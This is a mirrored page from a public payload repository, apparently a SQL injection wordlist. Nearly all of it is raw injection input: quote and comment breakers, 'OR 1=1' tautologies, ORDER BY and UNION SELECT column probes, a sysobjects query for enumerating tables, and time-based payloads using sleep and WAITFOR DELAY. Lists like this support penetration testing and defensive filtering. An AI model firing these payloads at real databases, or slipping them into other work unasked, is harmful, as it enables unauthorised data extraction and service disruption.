mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2024-07-23 11:28:16 +00:00
89 lines
1.1 KiB
Plaintext
89 lines
1.1 KiB
Plaintext
'
|
|
''
|
|
`
|
|
``
|
|
,
|
|
"
|
|
""
|
|
/
|
|
//
|
|
\
|
|
\\
|
|
;
|
|
' or "
|
|
-- or #
|
|
' OR '1
|
|
' OR 1 -- -
|
|
" OR "" = "
|
|
" OR 1 = 1 -- -
|
|
' OR '' = '
|
|
'='
|
|
'LIKE'
|
|
'=0--+
|
|
OR 1=1
|
|
' OR 'x'='x
|
|
' AND id IS NULL; --
|
|
'''''''''''''UNION SELECT '2
|
|
%00
|
|
/*…*/
|
|
+ addition, concatenate (or space in url)
|
|
|| (double pipe) concatenate
|
|
% wildcard attribute indicator
|
|
|
|
@variable local variable
|
|
@@variable global variable
|
|
|
|
|
|
# Numeric
|
|
AND 1
|
|
AND 0
|
|
AND true
|
|
AND false
|
|
1-false
|
|
1-true
|
|
1*56
|
|
-2
|
|
|
|
|
|
1' ORDER BY 1--+
|
|
1' ORDER BY 2--+
|
|
1' ORDER BY 3--+
|
|
|
|
1' ORDER BY 1,2--+
|
|
1' ORDER BY 1,2,3--+
|
|
|
|
1' GROUP BY 1,2,--+
|
|
1' GROUP BY 1,2,3--+
|
|
' GROUP BY columnnames having 1=1 --
|
|
|
|
|
|
-1' UNION SELECT 1,2,3--+
|
|
' UNION SELECT sum(columnname ) from tablename --
|
|
|
|
|
|
-1 UNION SELECT 1 INTO @,@
|
|
-1 UNION SELECT 1 INTO @,@,@
|
|
|
|
1 AND (SELECT * FROM Users) = 1
|
|
|
|
' AND MID(VERSION(),1,1) = '5';
|
|
|
|
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
|
|
|
|
|
|
Finding the table name
|
|
|
|
|
|
Time-Based:
|
|
,(select * from (select(sleep(10)))a)
|
|
%2c(select%20*%20from%20(select(sleep(10)))a)
|
|
';WAITFOR DELAY '0:0:30'--
|
|
|
|
Comments:
|
|
|
|
# Hash comment
|
|
/* C-style comment
|
|
-- - SQL comment
|
|
;%00 Nullbyte
|
|
` Backtick
|